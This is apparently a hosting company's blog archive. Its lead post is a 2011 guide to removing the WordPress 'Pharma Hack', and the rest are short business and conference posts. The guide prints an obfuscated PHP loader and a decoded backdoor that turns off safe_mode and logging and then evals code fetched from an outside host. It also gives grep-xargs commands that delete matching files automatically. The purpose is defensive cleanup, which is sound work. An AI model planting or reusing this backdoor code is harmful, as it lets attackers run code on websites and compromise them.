Current Location: Home / Archives for Web Hosting

Removing WordPress Pharma Hack

July 11, 2011 By 2 Comments

I posted a few weeks ago about the WordPress Pharma Hack that has been running pretty rampant across the web, in case you missed my initial post, here’s a link. Well, I would like to say that we were able to jump right on this thing and immediately remove it pretty easily, but that simply wasn’t the case. I worked closely w/ Matt Critcher, our server admin at Pleth, LLC, and probably one of the sharpest guys I know, and we toiled over this thing daily for about a week or so until we finally eradicated it from all of our WordPress installations. For the benefit of all of you that are still wrestling w/ this hack, here’s exactly how we removed it…

Locate all base64_decode

This hack, like a lot of others, used base64 code to disguise JavaScript (so we have to locate it and remove it, this is what it will look like)

< ? php $XZKsyG=’as’;$RqoaUO=’e';$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t';$joEDdb
=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY.......and so on...

To locate and remove the code, you will need to SSH into your server, CD into the wordpress home directory and do the following

grep -r 'php \$[a-zA-Z]*=.as.;' * |awk -F : '{print $1}' | xargs -I{} rm -v {}

This will scan the entire folder and all it’s sub-directories for any file containing the string “php $RANDOMLETTERS=’as’” and delete it verbosely. If you do not wish to delete it automatically just run this to print out the filename.

grep -r 'php \$[a-zA-Z]*=.as.;' * |awk -F : '{print $1}'

When we did this, there were about 50 files that contained the exploit.  There are other files containing nasty code as well. You will also need to to search for and remove files containing the string “wp_class_support”.

grep -r wp_class_support * |awk -F : '{print $1}' |xargs -I{} rm -v {}

This bit of syntax will search for files with that string and delete them (if you want to manually delete them, leave off the xargs part as per the above example).

I also found this nasty thing (not sure if it is related to the Pharma Hack) in several files. All were WordPress core files, so you MUST replace every WordPress file on your site with clean ones. DO NOT do this via the internal utility – use FTP, SCP, or whatever to get these files uploaded. Once you have done this, do

grep -r QGluaV9yZXN0b * |awk -F : '{print $1}'

This will search the remaining files for the exploit. Any files containing this MUST be replaced or you are still infected. The full text of the exploit the base64 encoded string as follows:

QGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTtAaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpO0BpbmlfcmVzdG9yZSgic2Fm
ZV9tb2RlX2luY2x1ZGVfZGlyIik7QGluaV9yZXN0b3JlKCJzYWZlX21vZGVfZXhlY19kaXIiKTtAaW5pX3Jlc3RvcmUoImRp
c2FibGVfZnVuY3Rpb25zIik7QGluaV9yZXN0b3JlKCJhbGxvd191cmxfZm9wZW4iKTsNCmlmKEBmdW5jdGlvbl9leGlzdHMo
J2luaV9zZXQnKSkNCntAaW5pX3NldCgnZXJyb3JfbG9nJyxOVUxMKTsgQGluaV9zZXQoJ2xvZ19lcnJvcnMnLDApOyBAaW5p
X3NldCgnZmlsZV91cGxvYWRzJywxKTsgQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsMSk7fQ0KZWxzZXtAaW5pX2FsdGVy
KCdlcnJvcl9sb2cnLE5VTEwpOyBAaW5pX2FsdGVyKCdsb2dfZXJyb3JzJywwKTsgQGluaV9hbHRlcignZmlsZV91cGxvYWRz
JywxKTsgQGluaV9hbHRlcignYWxsb3dfdXJsX2ZvcGVuJywxKTt9DQpmdW5jdGlvbiBHZXRTaGVsbENvbnRlbnQoJGhvc3Qs
JHVybCl7aWYoQGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpeyRmdWxsX3VybD0naHR0cDovLycuJGhvc3QuJy8nLiR1
cmw7JGN1cmw9Y3VybF9pbml0KCk7Y3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9VUkwsJGZ1bGxfdXJsKTtjdXJsX3NldG9w
dCgkY3VybCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLHRydWUpO2N1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfSEVBREVSLGZh
bHNlKTtjdXJsX3NldG9wdCgkY3VybCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULDEwKTtjdXJsX3NldG9wdCgkY3VybCxDVVJM
T1BUX1VTRVJBR0VOVCwnTW96aWxsYS80LjAnKTskZGF0YT1AY3VybF9leGVjKCRjdXJsKTtjdXJsX2Nsb3NlKCRjdXJsKTty
ZXR1cm4gJGRhdGE7fWVsc2VpZihAZnVuY3Rpb25fZXhpc3RzKCdmc29ja29wZW4nKSl7JGZwPUBmc29ja29wZW4oJGhvc3Qs
ODAsJGVycm5vLCRlcnJzdHIsMTApO2lmKCRmcCl7JG91dD0iR0VUIC8kdXJsIi4iIEhUVFAvMS4wXHJcbiI7JG91dCAuPSJI
b3N0OiAkaG9zdFxyXG4iOyRvdXQgLj0iVXNlci1BZ2VudDogTW96aWxsYS80LjBcclxuIjskb3V0IC49IkNvbm5lY3Rpb246
IENsb3NlXHJcblxyXG4iO0Bmd3JpdGUoJGZwLCRvdXQpO3doaWxlKCRhbnNbXT1mZ2V0cygkZnApKTtmY2xvc2UoJGZwKTsk
YW5zPXRyaW0oaW1wbG9kZSgnJywkYW5zKSk7JGRhdGE9KHRyaW0oc3Vic3RyKCRhbnMsc3RycG9zKCRhbnMsIlxyXG5cclxu
IikpKSk7cmV0dXJuICRkYXRhO319ZWxzZWlmKEBmdW5jdGlvbl9leGlzdHMoJ2ZpbGVfZ2V0X2NvbnRlbnRzJykgJiYgQGlu
aV9nZXQoJ2FsbG93X3VybF9mb3BlbicpPT0xKXskZnVsbF91cmw9J2h0dHA6Ly8nLiRob3N0LicvJy4kdXJsOyRkYXRhPUBm
aWxlX2dldF9jb250ZW50cygkZnVsbF91cmwpO3JldHVybiAkZGF0YTt9fQ0KaWYoJF9SRVFVRVNUWydzaCddICE9ICIiKSB7
ZXZhbChiYXNlNjRfZGVjb2RlKEdldFNoZWxsQ29udGVudCgiXHg3M1x4NjVceDZmXHg3NFx4NmZceDZmXHg3M1x4MmVceDYz
XHg2Zlx4NmQiLCJzL2kucGhwPyIuJF9SRVFVRVNUWydzaCddLiImaG9zdD0iLnVybGVuY29kZSgkX1NFUlZFUlsnU0VSVkVS
X05BTUUnXSkuIiZ1cmw9Ii51cmxlbmNvZGUoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKSkpO2V4aXQ7fQ==

Which decodes as

@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{@ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);}else{@ini_alter('error_log',NULL); @ini_alter('log_errors',0);
@ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1);}
function GetShellContent($host,$url){if(@function_exists('curl_init'))
{$full_url='http://'.$host.'/'.$url;$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,$full_url);curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_HEADER,false);curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0');$data=@curl_exec($curl);
curl_close($curl);return $data;}elseif(@function_exists('fsockopen'))
{$fp=@fsockopen($host,80,$errno,$errstr,10);
if($fp){$out="GET /$url"." HTTP/1.0\r\n";$out .="Host: $host\r\n";
$out .="User-Agent: Mozilla/4.0\r\n";$out .="Connection: Close\r\n\r\n";
@fwrite($fp,$out);while($ans[]=fgets($fp));fclose($fp);$ans=trim(implode('',$ans));
$data=(trim(substr($ans,strpos($ans,"\r\n\r\n"))));
return $data;}}elseif(@function_exists('file_get_contents') && @ini_get('allow_url_fopen')==1)
{$full_url='http://'.$host.'/'.$url;$data=@file_get_contents($full_url);return $data;}}
if($_REQUEST['sh'] != "")
{eval(base64_decode(GetShellContent("\x73\x65\x6f\x74\x6f\x6f\x73\x2e\x63\x6f\x6d","s/i.php?"
.$_REQUEST['sh']."&host=".urlencode($_SERVER['SERVER_NAME'])."&url=".urlencode
($_SERVER['REQUEST_URI']))));exit;}

I went ahead and scanned the whole site for files that had base64_decodes in them. To search for these do the following:

grep -r base64 * |awk -F : '{print $1}' |sort |uniq

This will print out a list of each file that contains the string “base64″. You should examine each file carefully for rouge content, as many files legitimately contain this string and need it to function. If you are unsure of the code, replace the file with a fresh copy. Most of the files I’ve seen that are infected have the base64 statement at the very top of the file but this is not always the case.

Once you get the files cleaned, you need to work on the database. The exploit adds and/or modifies entries in the wp_options table. Using the MySQL interpreter or phpMyAdmin run the following query:

SELECT * FROM `wp_options` where `option_name` LIKE 'rss%' ORDER BY `wp_options`.`option_name` ASC;

This will search the wp_options table for all entries beginning with rss_ and return them. You will need to delete each one that looks similar to this:

rss_552afe0001e673901a9f2caebdd3141d

rss_ followed by strings of random numbers or letters is bad and MUST be deleted as they are added by the exploit. Also, the exploit adds or modifies several other records in the same table. A couple of the sites we found recommended running this query as well as these options should not be set or contain any data:

delete from wp_options where option_name = "class_generic_support";
delete from wp_options where option_name = "widget_generic_support";
delete from wp_options where option_name = "fwp’";
delete from wp_options where option_name = "wp_check_hash";
delete from wp_options where option_name = "ftp_credentials";

—————————————————————-

If all goes well, this information should help you eradicate the WordPress Pharma Hack from your wordpress installation. For a more detailed post on how to remove this hack, I highly recommend Matt Critcher’s post on his blog…

 

Filed Under: Search Engines, Web Development, Web Hosting, Wordpress™ Tagged With: , ,

The WordPress Pharma Hack

June 16, 2011 By 1 Comment

Today I received an alert that one of our websites was reported by Google as being the victim of hacking and was being flagged as possibly dangerous in their search results. This immediately caught me off guard because our server admin, Matt Critcher, is one of the best in the business and nothing gets past this guy. We have several years of research and development and no telling how much cash invested in the security of our hosting environment. Granted, securing a server is something you have to work at just about everyday to eliminate new threats as they arise, and believe me, we take security very seriously.

Upon receiving this notification I immediately logged into the website that had been flagged and started looking for anything out of the ordinary. I was able to immediately eliminate most of the usual list of characters you see w/ open-source software attacks such as defaced pages or redirection scripting. I kept digging around and finally got on Skype w/ Matt to see if he had seen anything out of the ordinary from his end. We did some investigating and discovered that the hack itself wasn’t something that we could actually see on the website itself, but instead, it showed up in the Google search results for that website. In all of my years developing websites I can honestly say that I have never seen a hack quite like this before.

I did a little research and quickly stumbled upon this article on pearsonified.com discussing the “pharma hack” on websites running WordPress, they too had in fact fallen victim to this exploit and offered up some great information on how to diagnose the hack and furthermore how to eliminate it from your WordPress installations (which is somewhat tedious to do). I also ran across an awesome tool for scanning your website by Securi that is hosted online at this location. A few hours later Matt had already rid our servers of this exploit but not before we had discovered it in a few other locations, including this website. See screengrab of Google results at the bottom of this post.

Keep in mind that we keep a very close eye on all of our software installations and perform frequent updates to insure we have the latest versions of every application running. Somehow this sneaky hack found it’s way into our ecosystem, and quite honestly that’s an accomplishment on whoever launched this exploits part. I spoke to a friend this afternoon who also has a web hosting company and he had just learned that several of his clients were reporting inaccurate Google search results for their websites as well.

The questions I have at this point pertain to how in the world something like this could happen. I hope to learn more over the course of the next few days and will report back anything I should run across. In the meantime, it might not be a bad idea if you run WordPress to do a quite Google search for your website by entering in [site:www.yourdomain.com] to see if you have any weird page titles or meta information showing up, or give the Securi scanner a try to see if it can locate any problems you might not be aware of. Just glancing at a website page titles by browsing the site won’t work, everything looks normal.

Filed Under: Search Engines, Web Hosting, Wordpress™ Tagged With: , ,

Moving Files to the Cloud

December 27, 2010 By 3 Comments

dropbox-logoI have every source file from every web project that I have worked on for the past 10+ years stored on physical drives inside my office connected to my network. I also have backup media (CD’s, DVD’s) of these files also cataloged in an enormous library as a redundant backup system.  This has served me well over the years as I have always been able to put my hands on files when I needed them, albeit not as convenient as it could be sometimes.

Faced with needing to purchase additional storage for the new year for my library, I have made the decision to move my vast life’s work to the cloud for storage.  I am very familiar with Dropbox because that’s what we use at Pleth but while it’s extremely convenient, there are certain aspects of Dropbox’s service that I am not 100% happy with.  I basically have 3 machines that I work from, my DEV-001 Machine, my DEV-002 Machine (which is a test server), and of course my MacBook Pro. I also have a very specific method in which I store files on my machines. It’s a method that suits my OCD tendencies well and allows me to locate files quickly.

I have several directories in which I store files that I would like to synchronize across all three of my machines and I also have directories that I would like to store versions of, like subversion.  I know that doing this is probably possible w/ Dropbox, I have seen some creative uses for Dropbox’s service, but for some reason I decided not to go that route.

Instead I decided to go w/ a solution provider that Pleth already has a long-standing relationship with and opted to try their cloud storage solution.  My partners and I have played around with the idea of adding online storage to our repertoire of solutions in the past and hopefully my experiences with this solution can help further that process along.  I see cloud storage as a service businesses will one day view alongside email in terms of importance.

So far so good w/ this solution, I am able to do exactly everything that I have wanted to do in terms of setting up synchronization and versioning directories.  As soon as I get a little further into this solution I will likely blog about it.

In the meantime I was wondering…

  • What do you use for your personal / business backup solution?
  • Do you use Dropbox or another Cloud Based Solution?
  • Do you primarily use Cloud Storage as a Network Drive or do you Synchronize & Version?
Filed Under: Web Hosting Tagged With: , ,

Premium WordPress Hosting

June 3, 2010 By Leave a Comment

plethlogonew1[1] I have been thinking a lot lately about our hosting business at Pleth.  We never have really fit into our industry very well because our philosophy is completely different than 90% of the hosting companies in business today.  Most web hosting companies offer low-cost hosting plans with very few bells and whistles so they can keep their costs down and undercut their competitors prices.  Services like DNS Management, Website & Database Backups, Storage, and bandwidth are often sold separately as add-on items because they have little or no profit margin in their hosting rates.

My partners and I have never wanted to take our hosting business in that direction, primarily because the market is saturated already with companies trying to do exactly that.  Another reason we haven’t went that route is because it’s just not our style.  We see ourselves as niche hosting providers with a unique perspective in that we are also developers.  We cater to a large population of clients that could care less about web hosting, they just know they need it for their website to stay online, and they will pay extra to have someone else worry with all of the technical issues surrounding it. 

Our business philosophy when it comes to our hosting business has always been to add value to our infrastructure as opposed to looking for ways to cut corners and reduce overhead.  Since we started we have established our NOC (network operating center) in Dallas, as well as an alternate location in Houston.  We have also put a lot of thought into things like Bandwidth, Storage, Virtualization, and Automation.  We also have system monitoring in place as well as automated backups that will allow us to quickly restore any of our clients data that might have become lost or corrupt.  In addition to our robust backup system, we also have the industry’s leading control panel software, Plesk, running on our shared servers for our managed hosting clients.  Our server admin, Matt Critcher, has also devoted countless hours configuring our security solution, mod_security, to fight off security threats.

Before I go any further, I should probably say that we have done quite well with our hosting business.  I would venture to say that we have several hundred hosted domains running at any given time and our business continues to grow leaps and bounds despite the fact that we haven’t ever spent one penny on advertising campaigns, etc.  Our entire business has grown via word of mouth.  I have often wondered what our business would be like now had we promoted ourselves, but I honestly don’t see how we could bring on many more projects than we are handling currently.

The past few days I started thinking back to this past weekend’s Wordcamp Fayetteville  where I met a lot of people who work with wordpress on a daily basis, and that utilize a lot of premium solutions, such as premium themes and plugins.  Something I noticed at the conference was that the vast majority of people there were developers and bloggers who have their website(s) hosted by a third party provider.  This got me to thinking about premium wordpress hosting.  Granted, not everyone would be interested in paying for hosting their blog when they can get it for free or next to it from a handful of providers in the industry, but here’s what I keep coming back to.  The days of the Mommy Blogger sharing recipes and baby photos are behind us, I know several women right now who are actually bringing in a substantial income from their blogs, the same goes for men too.  My thoughts are that if someone has a blog that is bringing them $10,000 monthly in revenue, then they probably have already given some thought as to what they would do if the server their website is hosted on crashed.  I think this is the target market for this premium offering. 

In my mind, premium wordpress hosting not only consists of web storage for your database and files, but it also includes disaster recovery / backup solutions built in w/out having to purchase add-ons.  Premium WordPress hosting also includes a secure environment made possible via our ever changing security protocols and configuration. One thing that I also feel is very important is redundancy and failover connectivity, for example, our network has 19+ backbone providers. 

Last night I started mocking up a child theme for Genesis / Studiopress that would be a clean, simple, and very user friendly landing page of sorts to promote this premium offering.  I decided to use the enterprise child theme as my starting point for the project and somehow in between catching up on client emails and answering the telephone, I have managed to get the vast majority of the design & layout coded.  Below you will find a screenshot of the home page. 

screenshot-pleth-enterprise-2

My initial plan was to just add a page to our existing corporate website, which runs a different CMS than WordPress so after talking w/ a few people I had discussed this with earlier, I decided to create a small simple landing page site w/ details about this premium solution.  As of right now, I have no idea as to when this site will come online, it’s going to be a very basic site w/ only a few pages outlining our service offering but it’s likely going to take me several weeks to put together all of the content together given my current workload so stay tuned to this blog for more info on this project…

If you are interested in Premium WordPress Hosting, don’t hesitate to drop us a line…

Filed Under: Web Hosting, Wordpress™ Tagged With: ,

Rackspace Conference Interview

May 31, 2010 By Leave a Comment

rackspacelogo-thumb1[1] A few months ago I was interviewed at the Rackspace Reseller Conference in Atlanta, Georgia about a variety of topics related to Rackspace. 

As some of you might already be aware I am a huge fan of Rackspace as a company and their CEO Graham Weston, who shares a very similar service philosophy as my partners and I.  If I look a little rough in the video, please keep in mind that we were out until pretty late the night before this was shot and I am working of just a few hours of sleep. That’s my excuse…

My partners and I thoroughly enjoyed the conference and met a lot of really cool resellers from around the globe including Dubai, the Netherlands, Germany, and Mexico.  I also serve on the Rackspace (NASDAQ: RAX)Customer Advisory Board.  In the upcoming months I have also agreed to be part of a webinar focused on email archiving solutions, a product that Pleth has rolled out in a big way recently.

For more on the conference, please see the related links below…

Filed Under: Web Hosting Tagged With: ,

Pleth to Sponsor Wordcamp #wcfay

May 20, 2010 By Leave a Comment

pleth-logo-new[1] My partners and I are pleased to announce that Pleth will be sponsoring this years Wordcamp Fayetteville on May 29-30, 2010 in Fayetteville, Arkansas.  This will be the first ever Wordcamp in Arkansas.

From the minute I heard about the conference I knew that I wanted our company to be involved with it in some way.  The WordPress open source CMS accounts for a large percentage of our clients projects these days and with the advances expected in version 3.0 I can only see it’s deployment within our organization growing.

A week ago I had one of the planners from Wordcamp Fayetteville, Christopher Spencer, on The Cotton Club Podcast to discuss the upcoming event and to give us a rundown as to what we can expect to see at this inaugural event. In case you missed it, here’s a link to the show…

Below is a press release about Wordcamp Fayetteville that was released earlier this year:

 

Also, if you are on the fence about attending Wordcamp Fayetteville, here’s some incentive, there are only 5 spots remaining, better jump on Eventbrite and register now!!!

Filed Under: Miscellaneous, Web Development, Web Hosting, Wordpress™ Tagged With: , ,

Rackspace Conference Thoughts

March 10, 2010 By Leave a Comment

I am presently sitting in the Delta Sky Lounge hacking this blog post because our flight from Atlanta to Little Rock is delayed.  I am heading back from the Rackspace Reseller Conference to what looks like the Mt. Kilimanjaro of emails.  If you have sent me something that I haven’t tended to in the past week and half, please know that I have it on my desktop and will get back to you as soon as I get home.  To say it’s been a rough two weeks is an understatement.

The conference we attended was awesome.  It gave us an awesome opportunity to network and meet in person some contacts that we have known and worked alongside for a few years now.  Was pretty cool.  I made about two pages of notes on this new MacBook Pro and didn’t get frustrated the first time and toss it across the room.  That’s a sharp contrast to the less than 3 year old HP tablet PC I just had to trash.  I will be going through these notes and throwing up some blog posts as soon as I get back to my office and climb out from underneath email hell, so stay tuned.

One really cool thing about the trip that happened today, I was sitting in the food court outside the conference having lunch and looked up to find one of my sports heroes as a child.  Kevin Mchale of the Boston Celtics was just standing there getting a cup of coffee.  Mchale was a sports star back when sports stars could be considered positive role models.  Being the nerd that I am I had already twitpic’d the dude before he was finished putting sugar in his coffee.

Filed Under: Web Hosting Tagged With:

Rackspace Reseller Conference

March 8, 2010 By 2 Comments

Just a heads up, my business partners and I are heading to Atlanta for the next three days to attend the Rackspace Reseller Conference.  I will likely be in sessions for the biggest part of the next three days but will be checking email and voicemail whenever possible.  If you are going to be in Atlanta for the conference be sure to send me a tweet, @cottonr and let me know.  Maybe we can meetup between sessions.

Also, I will likely be blogging some things that I pickup during the conference, so stay tuned.

Filed Under: Web Hosting Tagged With:

Checkout the O’Reilly Answers Social Network

November 4, 2009 By 2 Comments

Image2 I am typically not one to recommend a social network to my clients w/ the exception, of course, of the already established networks such as Facebook, Twitter, LinkedIn, Tumblr, etc.  My whole philosophy regarding social networking at this stage of the game is that if you want to build a community, build upon what’s already out there as much as possible (Facebook API, Twitter API) and don’t try to re-invent the wheel. 

However, I have always felt that strong, reputable Niche networks could exist externally if they were packaged correctly.  A good example of such a network that is currently in Beta right now is O’Reilly Answers.  O’Reilly has a good vision with this network, and of course they have some really positive things in their favor already such as Awesome Reputation, an Established Following, and a Trusted Name, what more could you ask for?

You can also look at the Network and tell that there were some clear objectives put into place while developing this solution.  They obviously wanted it to be user friendly, functional, and interactive.  There are basically three ways you can interact inside O’Reilly Answers:

Share Your Knowledge    

You can actually enter in blog posts and tag them according to your subject matter and other users can comment you on your posts.  This is one area that I think they could have done a little differently.  We all manage our own blogs externally, why would we want to post our content on their website as well and have 2 comment systems running at the same time to follow up w/ readers?  My thoughts on this part are that they could have put into place some sort of RSS option where you could aggregate your content from your blog and have your friends inside the network click out to read your posts.  Maybe I am not seeing the big picture on this, but as a workaround I posted about 3/4 of 2 blog posts into their network along w/ a link at the bottom to get to the remainder of my post on my blog.

Ask A Question

Since O’Reilly has been catering to the Technically Minded community for so long, you can rest assured that some pretty sharp folks are going to be hanging around in this community.  Well, let’s say you have a question about a project you are working on, you can post that question to the community, tag it, and before you know it some of the sharpest minds in the world are answering your question.  This is an area where I really see this network having value for a lot of us…

Answer a Question

Let’s say someone asks a question and you know the answer, you can provide them w/ your insight w/ ease.  I think that this networking model is going to speed up the “obstacle to solution process” once the network get’s off the ground.

———————————————-

Also, just a few notes regarding the Network as it is right now.  There are obviously some bugs, I had a couple of errors pop up on me when I was setting up my profile, this is to be expected w/ a new release like this.  Give them time, I am sure that O’Reilly will iron out all of the kinks very soon.  Here’s some basic information that was forwarded to me today from our Account Rep at O’Reilly…

We’re launching the beta of O’Reilly Answers, and I’m inviting you to be part of it. In brief, O’Reilly Answers is a community site for sharing knowledge, asking questions, and providing answers that brings together our customers, authors, editors, conference speakers, and Foo (Friends of O’Reilly).

Why Answers, and why now?
O’Reilly is at the center of an amazing exchange of knowledge sharing and idea generation. We’ve created the usual means of facilitating communication between customers, O’Reilly folks, and the outside experts we call "alpha geeks" who contribute to O’Reilly books, conferences, and websites. We can connect through reader reviews, errata submissions, book forums, blog comments, Get Satisfaction, our customer service department, and more. But too much of this conversation is siloed, and not enough is public (e.g., discussions on our internal mailing list for editors, or personal responses to customer questions). O’Reilly Answers will be the place where much of that communication happens from this point forward.

Why participate?
The lofty reason: Like O’Reilly, you want to "change the world by spreading the knowledge of innovators." That’s our mission, and we’ve been fortunate enough to build a community of passionate, committed people who love to learn and share their knowledge as they work towards a better world for us all.

The "nice, but what’s in it for me" reasons: reputation, recognition, and rewards.

Get Recognized: "Find interesting people" is a core activity at O’Reilly, and an important component of our success. We see Answers as an important way to discover and connect with our next authors, online instructors, videographers, and speakers.

Build Your Reputation: You’ve learned a lot, why not get credit for all that knowledge? As your submissions to Answers are voted up, your personal reputation on the site increases. At launch, your reputation will be based solely on your participation in O’Reilly Answers. Soon, we’re expanding across oreilly.com, so the book errata and book reviews you’ve submitted, books you’ve registered, and conferences you’ve attended, will add reputation points. You’ll also earn badges to mark accomplishments and milestones.

Earn Rewards: Glory is great, but discounts and deals are nice, too. We want to reward your contributions to the O’Reilly community. Shortly we’ll have a point-based system in place that you can redeem for books, training, courses, and conferences. Details soon, but in the meantime, any actions you take now will count towards your total points.

This is just v.1: The best part of any project on the web is watching it take on a life of its own. With that in mind, we’re looking forward to *your* suggestions about where O’Reilly Answers should go, what features should be added, and what benefits and rewards we can offer all of you.

I’d like to acknowledge the projects that have proceeded Answers and inspired us, such as SitePoint Forums (we distribute their books), StackOverflow, Yahoo! Answers, Knol, and many others. They’re great resources, and we think the O’Reilly community can create a useful site that’s, well, a different kind of animal.

One last thing: O’Reilly Answers is in beta and you may encounter bugs. We’re still working on many improvements to the site, such as feeds for each tag, but would love to hear your suggestions for features and improvements. Please send any suggestions/questions/bug reports to answers@oreilly.com.

Until next time–
Marsee Henon

Also, if you should signup, be sure to add me as a friend, http://people.oreilly.com/cotton

Filed Under: Apache, Book Reviews, Central Arkansas Refresh, Domain Registration, E-Commerce, Email Solutions, MODx CMS, Monetization, Search Engines, Social Media / Web 2.0, Web Development, Web Hosting, Wireless, Wordpress™ Tagged With: , , , , , , , ,

Out of the Office: Pleth Corporate Retreat 2009

September 25, 2009 By Leave a Comment

This weekend is our Pleth corporate retreat.  Each year my business partners like to take some time away to focus on our business model.  We have been successful at doing this too in some pretty cool venues, Las Vegas and Chicago just to name a few, but this year we are taking a little more laid back approach, we will be on Greers Ferry Lake this weekend on a pontoon boat, bouncing ideas off of one another that we have compiled throughout the year. 

We have found that this process has helped us to refine our business tremendously.  We will of course be examining our current products and service offerings, thinking of ways to improve them, and also doing the whole creative process for new directions. 

All of this to say that I am signing off for the weekend and don’t expect to see me back in the office until next week! I do have a blog post on Usability that is scheduled to publish on Saturday but outside of that you probably won’t see much out of me except the occasional twitter or facebook post from me all weekend long, and trust me, I am ready for some R&R…

greersferrylakeaerialfromnorwood

Oh, and by the way, once we are finished brainstorming this weekend I suspect we will have some new and exciting announcements so be sure to stay tuned to our corporate website (www.pleth.com) and our personal blogs, (www.gregorysmart.com) and (www.kegalsmart.com).

Also, if you are one of our existing clients and have ideas as to how we can improve on our existing products and services, please feel free to comment below, we would love to hear your feedback…

Filed Under: Domain Registration, Web Development, Web Hosting Tagged With:
« Older Posts